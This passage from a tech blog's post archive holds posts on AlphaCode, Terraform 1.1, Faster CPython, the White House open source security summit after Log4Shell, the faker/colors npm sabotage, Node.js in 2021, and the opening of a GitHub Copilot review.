well-understood patterns. It makes me faster at writing code I already know how to write. That\u0026rsquo;s genuinely useful.\nAlphaCode operates at a higher level of abstraction — taking a problem description and producing a complete solution. But it requires massive computational resources, generates enormous volumes of candidates, and only works within the constrained domain of competitive programming.\nNeither system comes close to the kind of work that occupies most of a professional software engineer\u0026rsquo;s time: understanding business requirements, designing system architectures, debugging complex interactions between services, reviewing code for correctness and maintainability, and communicating technical decisions to non-technical stakeholders. Yet AI-assisted testing has emerged as a practical application.\nWhere This Is Heading # Despite my caveats, I don\u0026rsquo;t want to undersell what DeepMind has achieved. A year ago, AI systems couldn\u0026rsquo;t reliably solve even simple competitive programming problems. AlphaCode solving contest-level problems — even with brute-force sampling — represents genuine progress in machine learning for code.\nThe trajectory matters here. If we extrapolate from GPT-2 to GPT-3 to Codex, and from early code completion to Copilot to AlphaCode, the capabilities are improving faster than most people (including me) expected. The jump from \u0026ldquo;autocomplete lines of code\u0026rdquo; to \u0026ldquo;solve algorithmic problems end-to-end\u0026rdquo; happened in about 18 months.\nI expect the next iteration will significantly reduce the number of samples needed, improve the success rate on harder problems, and perhaps start to tackle problems that require more complex reasoning. The rapid evolution of AI systems has indeed followed this trajectory. Whether that leads to systems that can do meaningful software engineering — as opposed to competitive programming — remains an open question.\nMy Take # AlphaCode is an important research milestone. It demonstrates that large language models can, in a constrained setting, produce code that solves non-trivial problems. The competitive programming framing makes for great headlines, and DeepMind deserves credit for rigorous evaluation on unseen problems.\nBut I\u0026rsquo;d caution against the inevitable \u0026ldquo;AI will replace programmers\u0026rdquo; hot takes. The gap between solving a well-specified Codeforces problem with a million attempts and building, debugging, and maintaining a production system is vast. We\u0026rsquo;re not getting replaced. We are, however, getting better tools. And that\u0026rsquo;s been the story of software engineering for its entire history.\nWhat I find most interesting is the potential for these techniques to assist with debugging and code review — domains where generating many candidate fixes and testing them automatically could be genuinely useful. That\u0026rsquo;s a more practical near-term application than fully autonomous programming, and it\u0026rsquo;s where I expect the real value to emerge.\nThis is part of my AI in Development series, exploring how artificial intelligence is changing the practice of software engineering.\n","date":"3 February 2022","externalUrl":null,"permalink":"/posts/220203-deepmind-alphacode-ai-programming/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepMind’s AlphaCode system achieves competitive-level performance in programming contests, raising questions about what AI can and can’t do in software engineering.","title":"DeepMind's AlphaCode — When AI Enters the Coding Competition","type":"posts"},{"content":"HashiCorp released Terraform 1.1 earlier this month, and while the version number increment is modest, the features signal something important about where Infrastructure as Code is heading. The headline additions — moved blocks for state refactoring and convergence with Terraform Cloud workflows — address problems that have plagued real-world Terraform usage for years.\nThis release feels less like \u0026ldquo;here are cool new features\u0026rdquo; and more like \u0026ldquo;we listened to the pain points.\u0026rdquo; As someone who\u0026rsquo;s been managing infrastructure as code since the Puppet and Chef days, that kind of maturity is refreshing.\nThe Refactoring Problem, Finally Addressed # If you\u0026rsquo;ve managed a non-trivial Terraform codebase, you\u0026rsquo;ve hit this wall: you need to rename a resource or move it to a different module, but Terraform interprets this as \u0026ldquo;destroy the old thing and create a new thing.\u0026rdquo; For a development environment, that\u0026rsquo;s annoying. For a production database, it\u0026rsquo;s terrifying.\nThe traditional workaround was terraform state mv — a manual, error-prone command that operates directly on the state file. In team environments with remote state, this meant coordinating state operations carefully and hoping nobody ran a plan in between. I\u0026rsquo;ve seen teams avoid perfectly reasonable refactoring for months because the risk of a state manipulation mistake was too high.\nTerraform 1.1\u0026rsquo;s moved blocks solve this declaratively:\nmoved { from = aws_instance.webapp to = module.frontend.aws_instance.webapp } This is checked into version control, reviewed in PRs, and applied as part of a normal terraform apply. No manual state surgery, no coordination issues, no late-night incidents because someone fat-fingered a state mv command.\nIt seems like a small thing, but in practice it removes one of the biggest barriers to keeping Terraform codebases clean over time. Technical debt in IaC is particularly dangerous because the consequences of a bad refactoring aren\u0026rsquo;t a degraded user experience — they\u0026rsquo;re accidentally destroying production infrastructure.\nTerraform Cloud Integration # The 1.1 release also deepens the integration between the open-source CLI and Terraform Cloud. The cloud block replaces the older remote backend configuration, and the workflow for running Terraform plans remotely is more streamlined.\nThis matters because HashiCorp is clearly positioning Terraform Cloud (and its enterprise offering) as the default way to run Terraform in organizations. The open-source CLI remains free and fully functional, but the gravitational pull toward their managed platform is increasing.\nI have mixed feelings about this. On one hand, running Terraform in a managed environment with proper state locking, access controls, policy enforcement, and audit logs is genuinely better than the typical \u0026ldquo;someone runs terraform from their laptop\u0026rdquo; workflow. Terraform Cloud solves real operational problems.\nOn the other hand, the increasing coupling between the open-source tool and the commercial platform follows a pattern we\u0026rsquo;ve seen before in the DevOps space. Docker\u0026rsquo;s commercial pivot, Chef\u0026rsquo;s license change, and even HashiCorp\u0026rsquo;s own Vault Enterprise feature gating all follow similar trajectories. As users, we should be clear-eyed about the business model that supports the tools we depend on.\nThe Broader IaC Landscape in 2022 # Terraform\u0026rsquo;s continued evolution is happening in the context of a much broader IaC ecosystem. It\u0026rsquo;s worth stepping back and looking at where the alternatives stand:\nPulumi continues to gain traction with developers who prefer writing infrastructure in real programming languages (TypeScript, Python, Go) rather than HCL. Their recent Automation API is interesting — it lets you embed infrastructure provisioning inside application code. For teams that are already deeply invested in a specific programming language, Pulumi\u0026rsquo;s approach has clear ergonomic advantages.\nAWS CDK has established itself as the go-to for AWS-centric shops. The construct model is powerful, and the ability to compose high-level abstractions over CloudFormation resources reduces boilerplate significantly. The limitation, obviously, is the AWS lock-in.\nCrossplane is making a serious play for the Kubernetes-native infrastructure management space. If your team is already thinking in terms of Kubernetes resources and controllers, extending that model to infrastructure provisioning has a certain elegance.\nBicep is Microsoft\u0026rsquo;s answer for Azure infrastructure, offering a much more pleasant authoring experience than raw ARM templates.\nThe trend I see across all of these is convergence toward better developer experience. The early IaC tools required you to think like an infrastructure engineer. The current generation meets developers where they are — whether that\u0026rsquo;s their preferred programming language, their existing Kubernetes workflows, or their cloud provider\u0026rsquo;s native tooling.\nState Management Remains the Hard Problem # Despite all the progress in IaC tooling, state management remains the fundamental challenge. Terraform\u0026rsquo;s state file is both its greatest strength (enabling plan/apply workflows and drift detection) and its biggest operational burden (requiring locking, backup, and careful access control).\nEvery team I\u0026rsquo;ve worked with that uses Terraform at scale eventually builds custom tooling around state management. Whether it\u0026rsquo;s Atlantis for PR-based workflows, custom CI pipelines with state locking, or wrapper scripts that enforce safety checks, the raw Terraform CLI is rarely enough for production use.\nThe moved block in 1.1 is a step toward making state operations safer, but the underlying model — a single serialized state file that represents the truth about your infrastructure — has inherent scaling limitations. I\u0026rsquo;m curious to see whether the next generation of IaC tools will find better approaches to this problem.\nMy Take # Terraform 1.1 is a solid, mature release that addresses real operational pain points. It\u0026rsquo;s not exciting in the way that a new language or framework launch is exciting, but it\u0026rsquo;s the kind of improvement that makes daily life better for infrastructure engineers.\nIf you\u0026rsquo;re starting a new project today, Terraform remains the safe default choice for multi-cloud infrastructure management. Its provider ecosystem is unmatched, the community knowledge base is deep, and the 1.x stability guarantee means you\u0026rsquo;re not going to hit breaking changes.\nBut I\u0026rsquo;d also encourage teams to evaluate Pulumi for greenfield projects, especially if your infrastructure team is more comfortable in TypeScript or Python than HCL. The IaC landscape is healthily competitive right now, and that competition is driving genuine innovation in developer experience.\nThis is part of my Infrastructure Notes series, exploring the tools and practices that keep modern systems running.\n","date":"27 January 2022","externalUrl":null,"permalink":"/posts/220127-terraform-1-1-iac-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Terraform 1.1 brings refactoring support and moved/imported blocks, signaling that Infrastructure as Code tooling is growing up.","title":"Terraform 1.1 and the Maturing IaC Landscape","type":"posts"},{"content":"Python 3.11 alpha 4 dropped this week, and the benchmarks are turning heads. The Faster CPython project, led by Guido van Rossum and Mark Shannon with Microsoft\u0026rsquo;s backing, is showing real results. This continues the performance focus that started with 3.10. Early benchmarks suggest CPython 3.11 will be roughly 10-60% faster than 3.10 across a range of workloads, with the project\u0026rsquo;s stated goal being a 2x speedup over several releases.\nFor a language that\u0026rsquo;s been famously slow for three decades, this is a big deal. And the approach they\u0026rsquo;re taking is technically fascinating. The performance improvements complement Python 3.10\u0026rsquo;s pattern matching and other language improvements.\nThe Specializing Adaptive Interpreter # The headline feature driving performance gains in 3.11 is PEP 659 — the specializing adaptive interpreter. Rather than trying to optimize Python code ahead of time (which is incredibly difficult given the language\u0026rsquo;s dynamic nature), the interpreter now watches how code actually executes and optimizes hot paths at runtime.\nHere\u0026rsquo;s how it works in practice. When a bytecode instruction executes enough times (currently 8), the interpreter replaces it with a specialized version. For example, if a BINARY_ADD instruction consistently receives two integers, it gets replaced with BINARY_ADD_INT, which skips all the type-checking overhead and goes straight to integer addition.\nIf the specialization guess turns out to be wrong (say, someone passes a string where an integer was expected), the specialized instruction \u0026ldquo;deoptimizes\u0026rdquo; back to the generic version. This is similar in principle to what JIT compilers in V8 and HotSpot do, but CPython is doing it at the bytecode level without a JIT. That\u0026rsquo;s an important distinction — it means the performance gains come without the memory overhead and warm-up costs of a full JIT compiler.\nThe implementation adds new specialized opcodes for common patterns:\nLOAD_ATTR_INSTANCE_VALUE for attribute access on regular objects BINARY_OP_ADD_INT and BINARY_OP_ADD_FLOAT for arithmetic CALL_FUNCTION_BUILTIN for calls to built-in functions Several others for common dictionary and list operations Lazy Python Frames # Another significant optimization in 3.11 is the lazy creation of Python frame objects. In previous versions, every function call created a full frame object on the Python heap. In 3.11, frames are created on the C stack by default and only materialized as Python objects when something actually needs them (like a debugger or sys._getframe()).\nThis sounds like a minor implementation detail, but function call overhead is one of Python\u0026rsquo;s most significant bottlenecks. Reducing the cost of every function call has a cascading effect across essentially all Python code. Mark Shannon\u0026rsquo;s PEP 659 implementation notes show that frame creation was one of the top consumers of CPU time in typical Python workloads.\nThe practical result: function-call-heavy code (which is most well-structured Python code) gets a meaningful speedup for free, without any code changes. This makes Python more viable for performance-sensitive applications.\nWhy This Time Is Different # I\u0026rsquo;ll confess to some initial skepticism. We\u0026rsquo;ve heard \u0026ldquo;Python will get faster\u0026rdquo; before. Unladen Swallow (Google\u0026rsquo;s attempt to add LLVM-based JIT compilation to CPython) was abandoned in 2011. PyPy has been \u0026ldquo;the fast Python\u0026rdquo; for over a decade but never achieved mainstream adoption due to compatibility issues with C extensions.\nThree things make the Faster CPython project different:\nFirst, it\u0026rsquo;s happening inside CPython itself. No alternative runtime, no compatibility layer, no separate ecosystem. When 3.11 ships, everyone who upgrades gets the performance improvements. That\u0026rsquo;s a distribution advantage that no external project can match.\nSecond, Guido is leading it. Having the language\u0026rsquo;s creator driving performance work means the project has both deep language knowledge and political capital within the Python community. Technical decisions that might be contentious coming from an outsider are accepted more readily when Guido\u0026rsquo;s name is attached.\nThird, Microsoft is funding it. Guido joined Microsoft\u0026rsquo;s Developer Division in 2020, and the company is paying for a small team to work on this full-time. That\u0026rsquo;s the kind of sustained investment that open source performance work needs — you can\u0026rsquo;t optimize a decades-old interpreter in weekends and spare time.\nWhat This Means for Python Developers # If you\u0026rsquo;re writing Python today, here\u0026rsquo;s what\u0026rsquo;s actionable:\nDon\u0026rsquo;t change your code for performance yet. The optimizations in 3.11 work best on idiomatic Python. Writing \u0026ldquo;clever\u0026rdquo; code to work around interpreter limitations often makes things worse when the optimizer improves. Write clean, straightforward Python and let the interpreter do its job.\nStart testing against 3.11 alpha. If you maintain a library, set up CI against 3.11 now. The sooner compatibility issues surface, the easier they are to fix. Most well-maintained packages should work without changes, but C extensions occasionally need updates.\nWatch the benchmark results. The pyperformance benchmark suite is the standard measure. Current results show impressive gains on compute-heavy benchmarks (spectral_norm is 50%+ faster) and modest gains on I/O-heavy code (where the interpreter speed matters less).\nKeep realistic expectations. Even with a 25% average speedup, Python is still going to be slower than Go, Rust, or Java for CPU-bound work. The goal isn\u0026rsquo;t to make Python competitive in raw performance — it\u0026rsquo;s to make Python fast enough that performance isn\u0026rsquo;t the reason you choose a different language.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.x days, and I\u0026rsquo;ve watched the \u0026ldquo;Python is too slow\u0026rdquo; debate play out for years. The pragmatic answer has always been that Python\u0026rsquo;s productivity advantages outweigh its performance costs for most workloads, and for the hot paths, you drop into C extensions, Cython, or NumPy.\nWhat excites me about Faster CPython is that it\u0026rsquo;s a credible plan to shrink that performance gap without sacrificing what makes Python great. The specializing interpreter is technically elegant — it works with Python\u0026rsquo;s dynamic nature rather than against it.\nThe 3.11 release is scheduled for October 2022, and based on what I\u0026rsquo;m seeing in the alphas, it\u0026rsquo;s going to be one of the most significant CPython releases in years. Not for new syntax or features, but for making existing code run faster. Sometimes the most impactful improvements are the ones that require zero changes from the user.\nThis is part of my Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"20 January 2022","externalUrl":null,"permalink":"/posts/220120-faster-cpython-311-performance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Faster CPython project, backed by Microsoft and led by Guido van Rossum, is shipping real performance gains in Python 3.11 alpha.","title":"Faster CPython — The Ambitious Plan to Double Python's Speed","type":"posts"},{"content":"Today the White House hosted a summit on open source software security, bringing together executives from Google, Apple, Microsoft, Amazon, IBM, Meta, and several other major technology companies alongside government agencies. The catalyst, of course, was Log4Shell — the critical vulnerability in Apache Log4j that sent every security team scrambling last month. But the conversation went far deeper than one CVE.\nWhen the National Security Council invites you to discuss logging libraries, you know the landscape has fundamentally shifted.\nWhat Was Actually on the Table # According to statements from the White House, the discussion centered on three key areas: preventing security defects in open source code, improving the process for finding and fixing vulnerabilities, and reducing the time it takes to distribute and implement patches.\nThe subtext here is important. The US government has realized that critical national infrastructure depends on software maintained by volunteers. The same problem we\u0026rsquo;ve been discussing in open source circles for years has now become a matter of national security policy. Log4j made this impossible to ignore — the library is embedded in everything from enterprise Java applications to Minecraft servers, and the volunteer maintainers who had to drop everything during the holidays to patch it don\u0026rsquo;t work for any of the companies profiting from their code.\nGoogle\u0026rsquo;s Kent Walker proposed creating a new organization to serve as a marketplace for open source maintenance, essentially matching volunteers with critical projects that need support. The company also suggested designating certain open source projects as \u0026ldquo;critical infrastructure\u0026rdquo; with corresponding security requirements and funding.\nThe SBOM Push # One of the most concrete outcomes appears to be momentum around Software Bills of Materials (SBOMs). The executive order on cybersecurity from May 2021 already mandated SBOMs for software sold to the federal government, but adoption across the broader industry has been slow.\nFor those unfamiliar, an SBOM is essentially an ingredients list for software — a machine-readable inventory of every component, library, and dependency in your application. When the next Log4Shell happens (and it will), an SBOM lets you answer the question \u0026ldquo;are we affected?\u0026rdquo; in minutes rather than days.\nThe two main formats gaining traction are SPDX (backed by the Linux Foundation) and CycloneDX (from OWASP). If you\u0026rsquo;re not generating SBOMs for your builds yet, I\u0026rsquo;d strongly recommend looking into it now. Tools like syft from Anchore can generate them from container images, and most CI/CD platforms are adding native support.\nIn my experience, the hardest part isn\u0026rsquo;t generating the SBOM — it\u0026rsquo;s actually doing something useful with it once you have it. You need tooling to ingest, store, query, and alert on SBOM data. That ecosystem is still immature, but it\u0026rsquo;s developing fast.\nThe Funding Gap # Perhaps the most important discussion point was funding. The OpenSSF (Open Source Security Foundation) has been doing solid work since its founding in 2020, but its resources are modest relative to the scale of the problem. Several summit attendees reportedly discussed significantly increasing financial commitments.\nHere\u0026rsquo;s the math that should keep every CTO up at night: the Log4j vulnerability affected an estimated 35,000+ Java packages — roughly 8% of the Maven Central repository. The initial patch was developed by a handful of volunteers. The downstream impact on global commerce was measured in billions. Yet the project\u0026rsquo;s total annual funding was essentially zero.\nWe\u0026rsquo;re not just talking about Log4j here. The Census II study from the Linux Foundation identified hundreds of critical open source packages in similar situations — widely deployed, under-maintained, and one bad commit away from a global incident.\nThe faker.js incident from last week (where a maintainer deliberately corrupted his own packages) is another data point in this trend. Whether it\u0026rsquo;s burnout, malice, or negligence, the single points of failure in our dependency chains are real.\nWhat Actually Changes # I\u0026rsquo;ve been through enough government-industry summits to be cautiously skeptical about outcomes. The federal SBOM mandate is real and will drive adoption. The increased attention to open source security is genuinely positive. But structural problems require structural solutions.\nWhat I\u0026rsquo;d like to see:\nShort term: Major tech companies establishing dedicated open source security teams that contribute engineering resources (not just money) to critical projects. Google\u0026rsquo;s proposal for an \u0026ldquo;Open Source Maintenance Crew\u0026rdquo; is a step in this direction.\nMedium term: Industry-standard security baselines for open source projects that receive significant usage. Not bureaucratic certification schemes, but practical requirements like two-factor authentication for maintainers, signed releases, and automated dependency scanning.\nLong term: A sustainable economic model where the companies that profit most from open source contribute proportionally to its maintenance. This is the hardest problem and the one most likely to be kicked down the road.\nMy Take # I\u0026rsquo;m genuinely encouraged that this conversation is happening at the highest levels of government. For years, the open source sustainability problem was treated as a niche concern. Log4Shell made it a national security issue, and that kind of visibility creates real pressure for change.\nBut I\u0026rsquo;ll believe it when I see the funding numbers. Summits are easy. Multi-year commitments to fund unglamorous maintenance work on critical infrastructure are hard. The test isn\u0026rsquo;t what gets announced in the press release — it\u0026rsquo;s whether, a year from now, the maintainers of critical open source projects have the support they need to do their work sustainably and securely.\nIf you maintain open source software, pay attention to the OpenSSF\u0026rsquo;s initiatives in the coming months. If you consume open source software (and you do), start generating SBOMs and auditing your supply chain. The window between \u0026ldquo;this is someone else\u0026rsquo;s problem\u0026rdquo; and \u0026ldquo;this is a compliance requirement\u0026rdquo; is closing fast.\nThis is part of my Security in Practice series, exploring real-world security challenges and how to address them pragmatically.\n","date":"13 January 2022","externalUrl":null,"permalink":"/posts/220113-white-house-open-source-security-summit/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The White House convened tech leaders to address open source security after Log4Shell. Here’s what was discussed and what it means for developers.","title":"The White House Open Source Summit — When Log4j Gets Political","type":"posts"},{"content":"If you woke up this week to garbled terminal output from your Node.js applications, you weren\u0026rsquo;t alone. Marak Squires, the maintainer of the hugely popular faker and colors npm packages, deliberately pushed destructive updates to both libraries. The colors package now prints an infinite loop of gibberish characters, while faker was effectively gutted. Between them, these packages see tens of millions of weekly downloads. The fallout has been immediate and widespread. This incident exemplifies the supply chain vulnerabilities that the SolarWinds attack had demonstrated at a much larger scale months earlier.\nThis isn\u0026rsquo;t a hack. This isn\u0026rsquo;t a supply chain attack from an external actor. This is a maintainer who decided to torch his own projects. And that distinction matters enormously.\nWhat Actually Happened # On January 4th, Marak pushed version 6.6.6 of faker to npm — a version that replaced the library\u0026rsquo;s functionality with a brief message. Around the same time, colors version 1.4.1 introduced an infinite loop that writes garbage to the console using a fake \u0026ldquo;LIBERTY LIBERTY LIBERTY\u0026rdquo; American flag ASCII art sequence.\nThe colors package is a dependency of thousands of projects, including well-known tools. AWS CDK users were among the first to notice, as their CLI output suddenly became unusable. GitHub quickly locked Marak\u0026rsquo;s account and npm reverted the malicious versions, but the damage to trust was already done.\nLooking at Marak\u0026rsquo;s GitHub history, the warning signs were there. Back in November 2020, he opened an issue titled \u0026ldquo;No more free work from Marak\u0026rdquo; on the faker repository, expressing frustration that Fortune 500 companies were profiting from his unpaid labor. The issue linked to a blog post essentially invoicing major corporations for his work.\nThe Sustainability Problem Nobody Wants to Solve # I\u0026rsquo;ve been in this industry long enough to remember when open source was a philosophical movement, not an infrastructure dependency. The uncomfortable truth is that our entire modern software ecosystem runs on code maintained by people who often receive nothing for it. We\u0026rsquo;ve built a global digital economy on volunteer labor and then act surprised when volunteers burn out — or burn it down.\nThe core infrastructure initiative that started after Heartbleed in 2014 was supposed to address this. GitHub Sponsors exists. The OpenSSF is doing real work. But the fundamental economic model remains broken: companies extract billions in value from packages maintained by individuals who can barely pay rent. These systemic issues would be formally addressed by the White House just weeks later when global leaders convened to discuss open source security.\nThat said — and I want to be clear about this — deliberately corrupting packages that millions of developers depend on is not protest. It\u0026rsquo;s sabotage. There are real people whose systems broke this week. Small companies, individual developers, non-profits. They didn\u0026rsquo;t deserve to have their Thursday ruined because of a dispute with Fortune 500 companies.\nWhat This Means for Your Dependencies # If you\u0026rsquo;re running any Node.js project in production, you should already have done the following:\nPin your dependency versions. If you\u0026rsquo;re using ^ or ~ in your package.json for anything that touches production, stop. Use exact versions or lockfiles religiously.\nAudit your dependency tree. Run npm audit and actually look at what you\u0026rsquo;re pulling in. Most projects have hundreds of transitive dependencies they\u0026rsquo;ve never examined.\nConsider vendoring critical dependencies. For packages that are genuinely critical to your application, keeping a local copy isn\u0026rsquo;t paranoia — it\u0026rsquo;s engineering.\nSet up a private registry or proxy. Tools like Verdaccio or commercial offerings from JFrog and Sonatype let you cache and vet packages before they hit your CI/CD pipeline.\nThe npm ecosystem has over 1.8 million packages. The average Node.js project pulls in hundreds of transitive dependencies. Each one is a trust relationship with a maintainer you\u0026rsquo;ve probably never met. That model works remarkably well most of the time, but when it fails, it fails spectacularly.\nThe Governance Question # What\u0026rsquo;s interesting to me is the governance angle. npm (now owned by GitHub, which is owned by Microsoft) acted quickly to revert the packages and lock the account. But this raises questions about who really \u0026ldquo;owns\u0026rdquo; an open source package once it\u0026rsquo;s published to a registry. Similar governance and security concerns would resurface in later supply chain incidents as the ecosystem continued to mature.\nMarak created this code. He maintained it for years. Does the registry have the right to override his publishing decisions? Most developers would instinctively say yes — the ecosystem has to be protected. But that instinct should make us uncomfortable. If a registry can override a maintainer, then the maintainer doesn\u0026rsquo;t truly control their own project. That\u0026rsquo;s a governance model we should be explicit about rather than one we discover ad-hoc during incidents.\nThe npm dispute resolution policy was never designed for this scenario. It handles naming disputes, not maintainer sabotage. We need better frameworks.\nMy Take # I have sympathy for maintainer burnout. I\u0026rsquo;ve contributed to open source projects for decades, and the expectation that you\u0026rsquo;ll provide free support to companies making millions from your work is genuinely corrosive. But there\u0026rsquo;s a line between advocating for fair compensation and deliberately breaking production systems worldwide.\nThe real lesson here isn\u0026rsquo;t about one angry developer. It\u0026rsquo;s about an ecosystem that\u0026rsquo;s structurally fragile. We need better funding models, better governance, and better tooling to protect against this class of risk — whether the source is a burned-out maintainer, a compromised account, or a nation-state actor.\nLock your dependencies. Audit your supply chain. And maybe consider sponsoring the maintainers whose code your business depends on. It\u0026rsquo;s cheaper than the alternative.\nThis is part of my ongoing Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"6 January 2022","externalUrl":null,"permalink":"/posts/220106-faker-colors-open-source-sabotage/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A single developer deliberately corrupted two widely-used npm packages, exposing the fragility of the open source supply chain.","title":"When a Maintainer Burns It Down — The faker.js and colors.js Incident","type":"posts"},{"content":"As 2021 wraps up, I want to reflect on a platform that\u0026rsquo;s been central to my work for years: Node.js. This wasn\u0026rsquo;t a year of dramatic headlines for Node — no major controversies, no existential threats. Instead, it was a year of steady, purposeful maturation. And honestly, for a technology platform that powers millions of production applications, boring progress is exactly what you want.\nNode 16 Goes LTS # The headline event was Node.js 16 entering Long Term Support in October, becoming the recommended version for production use. Node 16 brought several features that have been cooking for a while:\nV8 9.4 under the hood means better performance and newer JavaScript features. Array.prototype.at(), Object.hasOwn(), and RegExp match indices are small quality-of-life improvements, but they add up.\nStable Timers Promises API — you can now import { setTimeout } from 'timers/promises' and await setTimeout(1000) instead of wrapping callbacks in Promises. It\u0026rsquo;s a tiny thing, but I use timers constantly in test code and integration scripts, and this reads so much better.\nnpm 8 ships with Node 16, bringing workspaces that are actually usable. If you\u0026rsquo;re managing a monorepo, npm workspaces are now a viable alternative to Yarn workspaces or Lerna for many use cases.\nMeanwhile, Node 17 came out in October as the Current release with some interesting experimental features. The one I\u0026rsquo;m watching most closely is the built-in test runner.\nThe Built-in Test Runner # Node 17 shipped with an experimental node:test module, and while it\u0026rsquo;s not production-ready yet, it signals an important direction. For years, testing in Node has required a third-party framework — Mocha, Jest, Ava, tap. Each has its own quirks, configuration, and ecosystem.\nHaving a built-in test runner means that simple projects don\u0026rsquo;t need a testing dependency at all. The API is clean:\nimport test from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert\u0026#39;; test(\u0026#39;basic arithmetic\u0026#39;, (t) =\u0026gt; { assert.strictEqual(1 + 1, 2); }); test(\u0026#39;async operation\u0026#39;, async (t) =\u0026gt; { const result = await fetchData(); assert.ok(result.length \u0026gt; 0); }); Will this replace Jest for complex applications? Probably not anytime soon — Jest\u0026rsquo;s mocking system, snapshot testing, and rich ecosystem are hard to replicate. But for libraries, small services, and quick scripts, having a zero-dependency test option is valuable. I\u0026rsquo;ve already started using it for utility libraries where adding Jest felt like overkill.\nThe TypeScript Migration Continues # One of the most notable trends in the Node.js ecosystem this year has been the continued migration toward TypeScript. The State of JS 2021 survey data isn\u0026rsquo;t fully in yet, but from what I\u0026rsquo;ve seen in the ecosystem, TypeScript adoption in Node.js projects has crossed a tipping point.\nMajor frameworks have gone TypeScript-first: NestJS continues to gain traction as the \u0026ldquo;enterprise\u0026rdquo; Node.js framework, and tRPC emerged this year as an interesting approach to end-to-end type-safe APIs. Even Express, the eternal incumbent, sees most new tutorial content written in TypeScript.\nWhat\u0026rsquo;s interesting is watching how this shifts the Node.js development experience. TypeScript adds a compilation step, which traditionally goes against Node\u0026rsquo;s \u0026ldquo;edit and run\u0026rdquo; philosophy. Tools like tsx and ts-node smooth over this friction, but there\u0026rsquo;s still an ongoing tension between TypeScript\u0026rsquo;s safety benefits and the added complexity.\nIn my own projects, I\u0026rsquo;ve fully committed to TypeScript for anything beyond quick scripts. The productivity gain from catching type errors at compile time — especially in large codebases with multiple contributors — far outweighs the setup overhead.\nESM: Almost There, Not Quite # ECMAScript Modules (ESM) support in Node.js continued its slow march toward becoming the default in 2021. Node 16 improved ESM support, and more packages are shipping ESM builds alongside CommonJS. But the migration is messy.\nThe fundamental tension is that CommonJS and ESM have different semantics — CJS is synchronous and uses require(), ESM is asynchronous and uses import. You can import CJS from ESM, but you can\u0026rsquo;t easily require ESM from CJS. This means the transition has to happen leaf-to-leaf through the dependency tree, and any package that goes ESM-only risks breaking downstream consumers that haven\u0026rsquo;t migrated yet.\nSome prominent packages made the leap this year — notably the got HTTP client and several packages in Sindre Sorhus\u0026rsquo;s ecosystem went ESM-only. This caused genuine pain for many developers and sparked heated debate about whether going ESM-only is responsible or reckless.\nMy take: ESM is the future, and the migration is worth it. But going ESM-only in a library right now is premature for most packages. Dual publishing (CJS + ESM) is more work but shows respect for your downstream consumers. We\u0026rsquo;ll get there, but forcing the transition creates unnecessary friction.\nDeno and the Competition # I\u0026rsquo;d be remiss not to mention Deno, Ryan Dahl\u0026rsquo;s successor project to Node.js. Deno had a productive 2021 — the Deno Deploy edge computing platform launched, and the runtime continued to improve. But in terms of production adoption, Deno remains a niche player.\nThat said, Deno is influencing Node.js in positive ways. Node\u0026rsquo;s built-in test runner, improved permission considerations, and the push toward web-standard APIs are all partially inspired by Deno\u0026rsquo;s design decisions. Competition in the JavaScript runtime space is healthy.\nMy Take # Node.js in 2021 reminds me of where Java was about a decade ago — mature, widely deployed, and evolving steadily rather than dramatically. That\u0026rsquo;s not a bad thing. When your platform runs a significant chunk of the internet\u0026rsquo;s backend services, stability and incremental improvement are features, not bugs.\nFor 2022, I\u0026rsquo;m most interested in three things: the built-in test runner reaching stability, further ESM adoption reducing the dual-module headaches, and whether the performance work in Node 18 narrows the gap with alternatives like Deno and Bun (the new Zig-based JavaScript runtime that\u0026rsquo;s been generating buzz).\nNode.js isn\u0026rsquo;t the exciting new thing anymore. It\u0026rsquo;s the reliable thing. After thirty years in this industry, I\u0026rsquo;ve learned to value reliable over exciting every single time.\nHere\u0026rsquo;s to another year of boring, productive progress.\n","date":"30 December 2021","externalUrl":null,"permalink":"/posts/211230-nodejs-2021-year-in-review/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js had a year of steady progress in 2021: Node 16 went LTS, the test runner landed, and the ecosystem continued its TypeScript migration.","title":"Node.js in 2021 — A Year of Quiet Maturation","type":"posts"},{"content":"It\u0026rsquo;s been about six months since GitHub launched the Copilot technical preview back in June, and I\u0026rsquo;ve been using it daily since getting access in July. With the holiday break approaching and some quieter days ahead, it feels like the right time to share an honest assessment of what AI-assisted coding actually looks like in practice — beyond the flashy demos and Twitter threads.\nThe short version: it\u0026rsquo;s genuinely useful, occasionally brilliant, frequently wrong, and has changed how I think about writing code in ways I didn\u0026rsquo;t expect.\nWhat It Actually Does Well # Copilot excels at boilerplate. The kind of code you\u0026rsquo;ve written a hundred times — setting up an Express route handler, writing a database query, implementing a standard sorting function, building a React component with props. This is where Copilot saves me the most time, and it\u0026rsquo;s not glamorous but it\u0026rsquo;s real.\nI\u0026rsquo;ve also been impressed by its ability to infer intent from comments and function names. Writing a comment like // Parse CSV file and return array of objects with headers as keys and having Copilot generate a reasonable implementation on the first try is genuinely delightful. It\u0026rsquo;s not always perfect, but it\u0026rsquo;s usually close enough that editing is faster than writing from scratch.\nThe tool is particularly strong with Python and JavaScript/TypeScript — no surprise given the training data composition. For these languages, I\u0026rsquo;d estimate it provides a useful suggestion about 40-50% of the time. For less common languages or specialized domains, that drops significantly.\nWhere Copilot truly shines is in test writing. Describe a function and its edge cases, and it\u0026rsquo;ll generate test scaffolding that covers most of what you\u0026rsquo;d write manually. I\u0026rsquo;ve found this to be the single biggest productivity gain — not because writing tests is hard, but because the mechanical aspect of setting up test cases is tedious enough that developers often skip edge cases.\nWhere It Falls Down # Let me be equally honest about the problems. Copilot confidently generates code that looks right but is subtly wrong. I\u0026rsquo;ve caught it producing SQL queries with injection vulnerabilities, generating regex patterns that miss edge cases, and writing async code with race conditions. The code looks plausible, which makes it more dangerous than obviously broken code.\nThis is my biggest concern: Copilot lowers the barrier for producing code, but it doesn\u0026rsquo;t lower the barrier for reviewing code. A junior developer who accepts Copilot suggestions without deep understanding will ship bugs that a junior developer writing code manually might not — because the manual developer at least had to think through the logic step by 